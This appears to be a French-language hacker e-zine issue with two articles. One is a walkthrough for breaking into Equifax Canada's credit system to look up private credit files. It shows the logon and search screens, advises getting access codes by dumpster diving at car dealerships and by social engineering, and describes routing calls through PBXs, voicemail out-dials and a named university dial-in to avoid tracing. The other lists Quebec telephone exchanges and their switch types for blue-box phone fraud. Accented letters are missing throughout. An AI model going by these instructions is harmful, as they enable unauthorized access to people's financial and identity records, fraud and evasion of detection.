ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
NOUS DEVELOPPONS POUR VOUS LES TELEPHONES DU FUTURS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
"CLASSEZ LE DANS LE REGISTRE DES DCDS!"
"OUAIS CHEF!"
QUIFAX
Par
AtrEiD BeVaTRoN
Beaucoup de gens croient
la vie prive. Beaucoup de gens croient
que le concept de vie prive est sacr. Beaucoup de gens croient qu'ils
ont droit
une deuxime chance. Beaucoup de gens croient que le fait
qu'ils aient pay cinq fois leur compte de Bell en retard ne changera
rien
leur vie et
leur marge de crdit. Beaucoup de gens croient
qu'ils sont libres.
Ils se trompent, vous vous trompez, ON EST TOUS DANS L'ERREUR PUTAIN
DE MERDE!!! Pourquoi? Parce que moi, comme vous et comme TOUS les autres,
nous sommes fichs, enchans dans l'engrenage que constitue le systme.
Je porte un numro de srie, comme vous tous, et n'importe quel imbcile
de presque n'importe o peut s'informer de ma sant, mes prestations
d'assurance-chmage, ma marge de crdit. C'EST IMPOSSIBLE VOYONS!!! C'EST
CONTRE LA VIE PRIVE!!!
Vous tes bien naf... En effet, je n'ai moi-mme, croyez-le o non,
qu'
composer un simple bordel de numro de tlphone, par modem, et me
voil
entr! Simple vous entends-je dire? TROP simple! Si simple que des
tas de personnes ne voient rien d'immoral dans le fait d'aller consulter
votre dossier, quand bon leur semble. Des fonctionnaires vreux vendent
vos informations
certains autres fonctionnaires encore plus vreux, qui
eux, comme par hasard, oublieront votre dossier sur le coin de leur
bureau, dossier qui se fera ramasser par une quelconque personne qui,
encore par hasard, dsirait justement, par hasard, effectuer une enqute
sur vous pour savoir si vous avez dj
fraud l'assurance-chmage.
Moi, j'appelle a une NORME coincidence!!! Et savez-vous ce qui est
le plus injuste l
-dedans? Le plus injuste, c'est que si vous appelez
vous-mme QUIFAX CANADA pour leur demander les infos sur VOTRE PROPRE
DOSSIER, ils vous rpondront que ces informations sont CONFIDENTIELLES!!
Attendez un peu, je suis curieux :
CONFIDENTIEL : Se dit de ce qui est dclar en secret
quelqu'un.
Autrement dit, Equifax devrait, en principe, possder des
informations secrtes? Hey merde! Voici un exemple de ce qu'il y a de
secret dans votre dossier:
J'ai souvent entendu parler (et j'en connais d'ailleurs certains qui
sont impliqus), de personnes places devant un certain problme, soit
qu'ils sont dans l'impossibilit TOTALE de se trouver un logement.
Simple, ils sont malpropres et non-civiliss! NON! Ils sont humains et
sont comme vous et moi! Alors, comment expliquez-vous a? Simple!
J'explique a par le seul fait que, pendant une priode d'environ
trois mois chacune, ces personnes ne sont pas arrives
boucler leur
budget comme il le fallait. Ce qui veut dire qu'ils ont eu beaucoup de
retard en rglant leur facture de logement. Rsultat: Les informations de
ces mmes personnes ont t communiques, par les proprios eux-mmes,
la Rgie du logement. La Rgie du logement s'est alors EMPRESSE
d'inscrire une note disant que ces personnes prouvaient certains
problmes financiers, et qu'ils constituaient donc une clientle
risque
pour les propritaires. Alors pour enchaner, lorsqu'une de ces personnes
se cherche un logement, le propritaire appelle
la Rgie, demande
certaines informations sur ces personnes, et se fait rpondre qu'il y a
des risques... Que croyez-vous qu'il fait? Il s'empresse lui-aussi de
jeter le nom et le numro de tlphone de la personne en question dans
les poubelles, et lui dit qu'il la rappellera... Vous imaginez la
suite...
Tout ce que je veux dire, c'est que la vie prive, OUBLIEZ A!!!
Tout ce que je veux dire, c'est que votre deuxime chance, OUBLIEZ-
LA!!!
Tout ce que je veux dire, c'est que la LIBERT, c'est une belle
connerie!!
Vous tes inscrits quelque part et votre dossier n'attend que de se
faire cueillir dans l'arbre florissant des informations CONFIDENTIELLES!
Quoi faire dites-vous? Pas grand chose, mais...
Ne restez pas esclaves comme ils le veulent! Ne restez pas passifs
comme ils le dsirent! AGISSEZ! Comment?, dites-vous de nouveau.
C'est ce que je me suis pos comme question, et j'ai pris les moyens
pour arriver
pntrer leur systme
la con... Et j'y suis arriv! Ce
texte vous expliquera EN DTAIL comment vous pouvez, vous-mme, vous
procurer un code valide sur le systme et comment vous en servir...
Certains diront que cela est ILLGAL!! Que pensez-vous alors de la
faon dont agit cette merde de gouvernement? Vous tes d'accord sur le
fait que presque n'importe quel imbcile de fonctionnaire peut avoir
accs
vos dossiers? Vous trouvez normal que presque n'importe qui, en
fait, puissent admirer votre dossier mdical? Alors vous n'tes qu'un
esclave! Un de ces loosers que les gens aiment
appeler : les passifs,
les bons citoyens... Ce texte n'est pas pour vous.
Passons maintenant
la pratique, sinon on va dire que je suis
subversif, sditieux et autres choses du genre... ;-)
Premirement, pour entrer dans le rseau quifax, vous aurez besoin
du programme ncessaire, communement nomm un TERM. Le TERM en question
est mieux connu sous le nom de C.I.S. (Credit Information System) de son
abrviation. Certains qui ont dj
pntr le systme viendront peut-tre
me dire que c'est possible sans le TERM, mais encore l
, je ne le crois
pas... Le term envoie des sries de lettres et de chiffres, chaque
commande correspondant
une srie de lettres. Le term est d'ailleurs ce
que j'ai toujours utilis, n'oublions pas qu'il se DOIT d'tre simple,
car en fait, les utilisateurs les plus frquents sont probablement des
personnes qui savent
peine comment manipuler un ordinateur.
O se procurer le C.I.S.?
Malheureusement, j'ai le regret de vous dire que joindre ce programme
dans l'archive de NPC serait illgal! <Ooooohhhh!> Pourquoi? Non pas pour
la raison de ce
quoi le programme servirait, mais simplement parce que
le programme de Term est Copyright. O se le procurer alors? Simple! Dans
tout bon bbs pirate, H/P ou autre, que ce soit
Qubec ou ailleurs comme
Montral ou Hull. Je n'ai toutefois jamais essay d'entrer sur un
systme de crdit amricain, je veux dire par une node amricaine, je ne
peux donc pas vous dire si le programme fonctionne pour CBI, mais je peux
le prsumer, tant donn que CBI n'est en fait que la version amricaine
de quifax. En effet, les deux systmes sont de mme souche.
Je vous entends dj
dire que vous ne serez pas capable de trouver
le numro. Vous avez peut-tre raison! ;-) TOUTEFOIS, nous NPCiens, nous
assurerons d'une chose lors de la distribution du logiciel C.I.S.. Nous
nous assurerons qu'un petit fichier du nom de NUMBERS.!!! soit intgr
dans l'archive. Ce fichier contiendra le, ou les numros connus avec
lesquels vous pouvez communiquer avec le systme quifax par modem. Nous
avons beaucoup hsit entre le choix d'inclure le numro d'accs de
Qubec, dans le journal, mais tant donn qu'
notre connaissance, C.I.S.
n'a jamais t distribu, nous nous assurerons qu'il le soit
convenablement, avec ce numro. En d'autres mots, le numro et le
logiciel sont deux choses indissociables.
LA CONFIGURATION DE C.I.S.:
Vous lisez NPC en ce moment et vous avez probablement appel
quelques part, par modem, pour l'avoir. Vous connaissez donc les bases de
la configuration d'un programme de communication. Ce programme ne fait
pas exception
la rgle. Il est trs simple
configurer. La doc de
Telemate devrait carrment faire l'affaire... Toutefois, si le besoin ou
la demande se fait ressentir, je me ferai plaisir d'inclure la doc
INTGRALE dans le NPC#5, chose que je ne fais pas maintenant pour la
seule raison nous voulons savoir si le sujet intresse les gens, mme si
nous nous en doutons, avant de nous lancer dans les explications
compliques et dtailles. Ce texte peut donc tre vu comme une
introduction, un Quick-Start au rseau QUIFAX...
LE LOGON:
Lui aussi est assez simple. Vous n'aurez besoin que de votre USER
ID, et de votre password correspondant. Je vous dcrirai plus loin
comment vous en procurer. Voici quoi faire une fois que vous serez
connect:
1- Appuyez seulement sur . et appuyez sur ENTER.
2- Vous verrez apparatre
l'cran:
DATABASE INFORMATION SERVICE
YOUR USER ID PLEASE:
3- Vous tapez ensuite votre numro d'usager et vous appuyez sur ENTER.
4- Vous verrez apparatre
l'cran:
PASSWORD
5- Vous entrez votre password et appuyez sur ENTER.
6- Vous verrez apparatre
l'cran:
PROCEED
Une fois entr, vous devrez indiquer au systme votre destination,
c'est-
-dire quel service vous dsirez utiliser. Voii ce que vous aurez
l'cran:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ³
³ ** C.I.S. ** ³
³ ³
³ SIGN ON MENU ³
³ -------------- ³
³ ³
³ ³
³ FACILITY................._________ ³
³ ³
³ PASSWORD................._________ ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Le terme FACILITY reprsente le service dans lequel vous dsirez
entrer et le PASSWORD est le mot de passe que vous pourrez vous procurer
avec un peu de Social Engineering avec une station de tlvision. Le
Social Engineering semble tre un don acquis pour nous tous, NPCiens,
phreakers, hackers, mais il en est peut-tre d'un tout autre cas pour
vous qui lisez cette article, qui tes peut-tre des non-initis. Dans ce
cas, je vous convie
lire NPC#5 dans lequel j'crirai un article sur les
principes de base du Social Engineering.
Voici la liste des services dans lesquels vous pouvez vous diriger:
CONSUMER REPORTING..................: CONS
COMMERCIAL REPORTING................: COMM
ADDITIONAL COMMUNICATION FACILITIES.: ACF
COLLECTIONS.........................: COLL
Je vais d'ailleurs rserver ce texte
la partie CONSUMER REPORTING,
et ferai un complment, une suite
ce texte qui aura en fait deux
parties. La partie CONSUMER REPORTING concerne les gens comme vous et
moi, les gens qui subissent cette merde d'injustice.
BON! Vous avez entr le FACILITY et le bon PASSWORD correspondant,
voil
ce que vous verrez apparatre
l'cran:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ** C.I.S. ** ³
³ C R E D I T B U R E A U M E N U ³
³ ------------------------------------- ³
³ ³
³ 1. Credit bureau reporting online access ³
³ 2. Credit bureau reporting batch access ³
³ 3. Save inquiries on disk ³
³ 4. ³
³ 5. Clear all inquiries ³
³ 6. Quit ³
³ ³
³ Select Option Number Return ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Option 1 - Credit bureau reporting online access :
Voici ce que vous lirez et devrez remplir. Certains espaces ne sont
pas ncssaires pour donner les coordonnes de recherche, d'autres sont
OBLIGATOIRES, comme le Billing Code et la Date du jour...
Les "blancs" que vous devez remplir dans cette page sont les keywords qui
fera chercher leur ordinateur, pour trouver la personne que vous
recherchez.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ *** SUBJECT DATA ENTRY *** ³
³ ³
³ Network:__ File:__ Billing:__ Client:________ ³
³ Date: __/__/__ ³
³ **SUBJECT** ³
³ Last Name...:________________ ³
³ First Name..:________________ Suffix:__ ³
³ Middle Name.:________________ Sp.First Name:__________ ³
³ Sp.Last Name:________________ ³
³ ³
³ **CURRENT ADDRESS** **FORMER ADDRESS** ³
³ Street No:__________ Street No:____________ ³
³ Street Name:____________ Street Name:__________ ³
³ Street type:____________ Street type:__________ ³
³ City:________ Appartment:___ City:_________ Appartment:___ ³
³ Province:__ Postal Code:______ Province:__ Postal Code:_______ ³
³ ³
³ **EMPLOYMENT** ³
³ Occ:__________________________ Emp:___________________________ ³
³ ³
³ **IDENTIFICATION** ³
³ Subject.. DB: __/__/__ AGE:___ SSS:___-___-___ ³
³ Spouse.. DB: __/__/__ SSC:___-___-___ ³
³ ³
³ F1 Send F2 Add FK F3 Review F6 Delete Inq F9 Redial ESC ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Voici les significations des paramtres les moins vidents:
NETWORK: Il peut tre compos d'une des deux lettres existantes.
A - ACRO (quifax Network)
C - CBI (CBI Network - USA)
FILE : Indique le type de fichier
demander.
I - Individual File : Uniquement le fichier de la personne
en question sera demand.
J - Joint File : Les fichiers de la personne demande
ET de son pouse ou poux.
M - Military File : Disponible seulement du rseau CBI.
Non valable pour quifax.
S - Segmented File : Indique que vous ne dsirez que la
partie du dossier relevant de
l'identit de la personne. (Nom,
addresse, date de naissance, numro
d'assurance sociale, profession)
BILLING CODE : Un PETIT code d'accs qui vient normalement avec le
programme. Il doit tre inscrit pour continuer
entrer
les coordonnes de recherche. Il existe environ 50 codes
d'accs
travers le rseau quifax.
CLIENT : Cette partie apparat automatiquement aprs l'inscription du
Billing Code...
DATE : Vous DEVEZ inscrire la date. Simple, c'est la date du jour o
vous tes!!
SUFFIX : Sr, Jr, 1, 2, 3, Dr, Rv.
SP.xxxx NAME : Sp veut dire SPOUSE, soit poux ou pouse.
SSS : Numro d'assurance sociale de la personne en question.
SSC : Numro d'assurance sociale de l'pouse ou poux de la personne.
Voici la liste des paramtres OPTIONNELS et ceux OBLIGATOIRES
entrer dans le rpertoire de recherche:
OPTIONEL = P
OBLIGATOIRE = B
NETWORK = B
LAST NAME = B
FIRST NAME = B
SUFFIX = P
MIDDLE NAME = P
SP.FIRST NAME = B
SP.LAST NAME = P
STREET NUMBER = P
STREET NAME = P
STREET TYPE = P
APARTMENT # = P
CITY = B
PROVINCE,STATE = B
POSTAL CODE = P
EMPLOYMENT = P
AGE = P
SSS = P
SSC = P
BIRTH (DB) = P
Une fois que tous les paramtres de recherche requis sont entrs,
simplement appuyez sur F1 (send) et les INFOS seront automatiquement
affiches
l'cran.
Je ne m'attarderai que sur l'option 1, car les autres options comme
Credit Bureau Reporting Batch Access concernent surtout les vritables
utilisateurs. En effet, pour l'utilisation que nous et vous dsirons en
faire, l'option 1 sera amplement suffisante!
Et voil
pour la partie de l'entre. Voici quelques notes diverses
maintenant, comme O TROUVER DES FOUTUS CODES D'ACCS?!?
Les codes d'accs:
J'espre que vous n'avez pas peur de vous salir, car vous devrez
vraiment ne pas hsiter. Vous devrez aller trasher! Et pas dans les
poubelles du Bell cette fois, mais bien dans les poubelles d'UN
CONCESSIONNAIRE AUTOMOBILE! Ceci peut sembler assez ridicule
premire
vue, mais o pouvez-vous dpenser le plus d'argent en un laps de temps
incroyablement court? Chez un concessionnaire automobile. C'est pourquoi
les vendeurs possdent en gnral tous un code, si bien que quifax est
utilis trs rgulirement par eux, puisqu'ils doivent savoir si les
acheteurs sont des placements srs.
D'autres faons? Bien sr! Il y a le Social Engineering par exemple.
Ce qui veut dire que vous devez utiliser votre belle voix! Voici quelques
endroits o utiliser votre imagination: Les stations de tlvision et de
radio, les concessionnaires automobiles, les banques, certains
bijoutiers. Enfin vous voyez le genre? Tout ce qui cote beaucoup
d'argent!
Le danger d'utilisation frauduleuse:
Je n'aime pas beaucoup le terme FRAUDULEUX... Je trouve que ce
systme en entier devrait tre dclar FRAUDULEUX
mon avis, mais
puisqu'il faut appeler les choses par leur nom, employons les bons
termes!
Vous avez lu le texte sur les PBXs dans NPC #1? LISEZ-LE! Enfin si
vous n'y connaissez rien, parce que quifax, CBI, TRW et tous les autres
rseaux de renseignements de crdits sont trs dangereux. Ce qui veut
dire? Ce qui veut simplement dire que si on vous surprend, vous pouvez
presque dire adieu
votre dossier judiciaire! Il ne faut videmment pas
exagrer, mais soyez prudent! COMMENT?
1- 418-656-7700 vous connaissez? C'est dj
mieux que d'appeler de chez
vous. Il sagit du numro de tlphone du rseau de l'Universit Laval.
Avec a, vous vous connectez, faites -=-=-=-=-= jusqu'au BIP, et
partir
de l
, faites E pour Externe. Ils vous demanderont le numro de votre
point d'arrive, tapez simplement le numro de quifax.
2- Mme avant d'appeler
l'universit, prenez la peine de passer par
un ou mme 2 PBX, diverters ou Out-Dials de VMB.
Personnellement, lorsque je veux entrer dans le rseau, je prends
BEAUCOUP de prcautions: J'appelle un OUT-DIAL DE VMB. De l
, j'appelle
un PBX amricain 800. De l
, je contacte un Decserver 800 amricain. De
l
, j'appelle un UNIX de qubec avec lequel je peux out-dialer et de l
,
j'appelle l'Universit Laval. Je rappelle l'Universit Laval 2-3 fois
partir de l'Universit Laval (je fais une loop) et de l
, j'appelle enfin
quifax! Simple hein? ;-) Toutefois, je rserve cela pour mes sessions de
trs longues dure. Si vous ne dsirez faire qu'une seule requte, ne
faites que passer d'un PBX 800
l'Universit Laval et de l
, vous pouvez
appeler quifax sans problme....
Voil
pour cet article, crit un peu rapidement je l'avoue,
puisqu'il ne s'agissait que d'une introduction! (Une intro de 8 pages!
Pouha!)
Je n'ai parl que de la partie CONSUMER. Je parlerai dans le
prochain numro de la partie COMMERCIALE, enfin si la demande est
interessante. Le rseau quifax en est un trs complexe, trs grand, et
il vaut vraiment la peine d'tre entr au moins une seule fois dans la
vie d'un hacker... Lorsque j'y entre, je constate
quel point ils se
foutent tous de la vie prive! Ca me dgoute!
Je tiens
rajouter que nous-mme, de NPC, n'avons jamais, JUSQU'þ
MAINTENANT, t tents d'aller jouer dans les dossiers de crdit des
ennemis de NPC...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
LES FACTURES ROUGES, C'EST POUR LE TEMPS DES FETES
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
QUAND LES BLUE-BOX PARCOURAIENT LA TERRE...
par
Blitzkreig
" -Is it safe?
-What?
-I said: Is it safe?"
-Marathon Man
Un de nos lecteurs d'Asbestos, -668, Satan's Neighbor-, nous crit
pour nous demander si la "bonne vieille poque" des blue-boxes tait
vraiment termine. Il se plaignait du fait qu'il avait t trop jeune
l'poque de l'utilisation florissante des boxes, et qu'il regrettait de
ne pas avoir connu cette priode apparemment fantastique. J'ai les mmes
regrets
propos de Woodstock et de la gnration hippie: tout ce bon
acide que je n'ai jamais got...
Non, Neighbor, le blue box n'est pas tout
fait mort. Il se porte
encore trs bien dans plusieurs parties du monde, comme au Portugal, par
exemple. Mais l'arrive de systmes de plus en plus perfectionns dans
les centrales des fonecos augmente le risque de dtection du dsormais
clbre 2600 Mhz... Les ESS et DMS, par exemple, vont te spotter en moins
de temps qu'il n'en faut pour crier "Je dbute, mais j'ai des tones"...
Ce problme pos, il faut maintenant prciser que le Bell n'a pas
install des ESS dans tous ses CO, loin de l
. Il y a encore des
endroits, au Qubec, o le B.B. est encore autre chose qu'un groupe de
chanteurs pour midinettes. Northern Phun Co, ne reculant devant rien
(surtout qu'il n'y a rien en avant de nous!), publie aujourd'hui, en
exclusivit MONDIALE, la liste COMPLETE des diffrents bureaux du Bell
avec chacuns des sytmes installs. Y!
Il est a noter que le nom
gauche indique le nom du CO, et non de la
ville. Bien sr, dans 98% des cas, les deux correspondent. Mais dans
d'autres... Ainsi, les deux bureaux
Qubec, St-Cyrille d'Aiguillon,
sont identifis comme tels, et non pas dans "Qubec".
En cas de doute, vrifiez l'indicatif (NNX) pour voir s'il correspond au
votre.
QUIPEMENT DE CENTRAL - LEXIQUE
NNX Indicatif de central
P-A-P Central pas
pas
5XB Bureau crossbar #5
ESS Systme de commutation lectronique #1
SP1 Systme de commutation lectronique SP1
N5-1 Crossbar N5-1
N5-2 Crossbar N5-2
SA-1 Crossbar SA-1
NJ-92 Radio-tlphone de circonscription
DMS 10 Autocommutateur DMS 10
DMS 100 Autocommutateur DMS 100
Ericson Crossbar Ericson
LAMA Comptabilit automatique locale des appels
RLM Unit de raccordement distant
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
AEROPORT BAGOTVILLE 677 x
ALBANEL 279 x
ALMA 662-8-9 x
ANCIENNE LORETTE 871-2-4-7 x
ANSE ST-JEAN 272 x
BAIE STE-CATHERINE 237 x
BAIE ST-PAUL 435 x
BEAUPORT 661-3-4 x
BEAUPORT 660-6-7 x
BERGERONNES 232 x
BIENCOURT 499 x
BLACK LAKE 423 x
BOISCHATEL 822 x
CABANO 854 x
CHAMBORD 342 x
CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA
CHARNY 832 x
CHICOUTIMI 545-9-690-3-8 LAMA
CHICOUTIMI 543-5-6 x
CHUTE DES PASSES 377 x
CLERMONT 439 x
D'AIGUILLON 692-4 LAMA
DESBIENS
DELISLE 347 x
DOLBEAU 276 x
EAST BROUGHTON 427 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
ESCOUMINS 233 x
FERLAND 676 x
GARTHBY 458 x
GIRARDVILLE 258 x
HEBERTVILLE 343-4 x
ILE AUX COUDRES 438 x
INVERNESS 453 x
JONQUIERE-MELLON 548 x
JONQUIERE-ST-JACQUE 542-7-695 x
LA BAIE 544-697 x
LAC BOUCHETTE 348 x
LA DORE 256 x
LA MALBAIE 665 x
LA POCATIERE 856 x
LATERRIERE 678 x
LEEDS 424 x
LES EBOULEMENTS 635 x
LEVIS 833-5-7-8 x
L'ISLE VERT 898 x
LORETTEVILLE 842-3-5-7 x
AKULIVIK 496 x
ARUNDEL 687 x
ASBESTOS 879 x
AUPALUK 491 x x
AYER'S CLIFF 838 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
AYLMER 684-5 x
AYLMER 682 x
BAKER LAKE 793 x
BISHOPTON 884 x
BOUCHETTE 465 x
BROMPTONVILLE 846 x
BUCKINGHAM 986 x
BUCKINGHAM 281 x
BURY 872 x
CHAMPLAIN 295 x
CHAPEAU 689 x
CHARTIERVILLE 656 x
CHELSEA 827 x
COATICOOK 849 x
COMPTON 835 x
COOKSHIRE 875 x
DANVILLE 839 x
DEAUVILLE 864 x
DESCHAILLONS 292 x
DRUMMONDVILLE 472-5-8 LAMA
DRUMMONDVILLE 474-7 x
EAST ANGUS 832 x
EAST HEREFORD 644 x
FORT COULONGE 683 x
FORTIERVILLE 287 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
GATINEAU 643-663-9 LAMA
GRACEFIELD 463 x
GRAND MERE 533-8 x
GRAND REMOUS 438 x
HULL 770-1-6-7 x
HULL 595-770-2-3-953-994-7 LAMA
HULL 775-956-976 LAMA
INUKJIAK 254 x
IVUJIVIK 922 x
KANGIQSUALUJJUAQ 337 PBX 711
KANGIQSUJUAK 338 PBX 711
KANGIRSUK 935 x
KAZABAZUA 467 x
KUUJJUAQ 964 x
LABELLE 686 x
LAC DROLET 549 x
LAC MEGANTIC 583 x
LA MINERVE 274 x
L'ANNONCIATION 275 x
LA PATRIE 888 x
LAURIERVILLE 365 x
L'AVENIR 394 x
LOUISEVILLE 228 x
LOW 422 x
LONGUEIL-RTH 468-647 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
LONGUEIL-RTH 448 x
MANSONVILLE 292 x
MARIEVILLE 460 x
MASCOUCHE-ANGLAIS 467-968 x
MASCOUCHE-DUPRAS 474-966 x
MIRABEL-AEROPORT 476 x
MIRABEL-ST-AUGUSTIN 475 x
MIRABEL-STE-SCHOLA. 258 x
MONKLAND 369-481-2-3-4-5-6-7-8-9 LAMA
MONKLAND (Tel cel.) 497-591-4-944-5-7-952-983 LAMA
MONTREAL-NORD 321-2-3-4-5-6-7-8-852-955 LAMA
MONTREAL-NORD 327-9 x
MORIN HEIGHTS 226 x
NAPIERVILLE 245 x
OKA 479 x
ONTARIO (42CG1) 281-2-4-5-6-8-842 x
ONTARIO (42CG4) 287-841-7-8-863-499-982-7-350 LAMA
ONTARIO (42CG2) 496-280-283 LAMA
ONTARIO 840-3-4-5-9-289-985 LAMA
ORMSTOWN 829 x
PAPINEAU 523-4-7-8-790-859 LAMA
PAPINEAU 521-2-5-6-9-596-7-8-599 LAMA
PAPINEAU 941-4-5-7-952 LAMA
PIERREVILLE 568 x
POIN. TREMBLES-51e 498-642-4 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
POIN. TREMBLES-8e 640-5 x
POIN. TREM.-RIV. PR 643-8 x
POIN. TREM.-RIV. PR 494-881 LAMA
POIN. CLAIRE-ST-ANN 457 x
POIN. CLAIRE-ST-JOH 630-426-428-695-7 LAMA
PONT-VIAU 662-3-7-8-9-629-967-975 x
RAWDON 834 x
RIGAUD 451 x
RIVIERE BEAUDETTE 269 x
ROXBORO 683-4-5-421 LAMA
STE-ADELE 229 x
ST-ALPHONSE DE ROD. 883 x
ST-ANDRE E. 537 x
STE-ANNE DS PLAINES 478-838 x
ST-BARTHELEMY 885 x
ST-BLAISE 291 x
ST-BRUNO 461-653 x
ST-BRUNO 441 x
ST-CALIXTE 222 x
ST-CESAIRE 469 x
ST-CHRYSOSTOME 826 x
ST-CLET 456 x
ST-CONSTANT 632-8 x
ST-CONSTANT 635 x
ST-DAMASE 797 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
ST-DENIS 787 x
STE-DOMINIQUE 270-1-2-3-4-6-7-8-9-495-948 LAMA
ST-EUSTACHE 472-3-491 x
ST-EUSTACHE 623-974 LAMA
ST-FELIX DE VALOIS 889 x
ST-GAB. DE BRANDON 835 x
STE-GENEVIEVE 620-6 x
STE-GENEVIEVE 624-696 LAMA
ST-HIPPOLYTE 563 x
ST-HYACINTHE 773-4 x
ST-HYACINTHE 771-8 LAMA
ST-JACQUES 839 x
ST-JEAN DE MATHA 886 x
ST-JEAN LEBEAU 348-9 x
ST-JEAN LEBEAU 359 x
ST-JEAN-ST-JACQUES 346-7-357-8 LAMA
ST-JEROME 431-8-565-9 x
ST-JEROME 432-6 x
STE-JULIE VERCHERE 649 x
STE-JULIENNE 831 x
STE JUSTINE 764 x
ST-LAMBERT-ELM 465-6-671-2-923 LAMA
ST-LAMBERT-ST-HUBER 443-5-462-676-926 LAMA
ST-LAMBERT-ST-HUBER 656-678 x
ST-LAURENT 744-7-8-835 RLM
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
ST-LAURENT 283 RLM
ST-LIN 439 x
STE-MADELEINE 795 x
ST-MARC 584 x
STE-MARGUERITE 228 x
STE-MARTHE 459 x
STE-MARTINE 427 LAMA
ST-MICHEL 374-6-593-721-2-3-5-7-8-9 LAMA
ST-MICHEL SAINTS 833 x
ST-PAUL ABBOTSFORD 379 x
ST-PAUL L'ERMITE VOIR VILLE LE GARDEUR
STE-PIE DE BAGOT 772 x
STE-PIE-DE-GUIRE 784 x
ST-POLYCARPE 265 x
ST-REMI 454 x
STE-ROSE 622-5-8-963 LAMA
ST-SAUVEUR 227 x
ST-THEODORE 882 x
STE-THERESE-EGLISE 430 x
STE-THERESE-EGLISE 433-4-5-7-979 x
STE-THERESE-OUIMET 621-975 LAMA
ST-VINCENT PAUL-FAB 661-4 x
ST-VINC. PAUL-RIV P 665 x
ST-ZEPHIRIN 564 x
ST-ZENON 884 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
SAUVE 381-3-5-7-8-9-858 LAMA
SAUVE 382-4 x
SAUVE 386-592-942-3-9-951-3-984 LAMA
SHAWBRIDGE 224 x
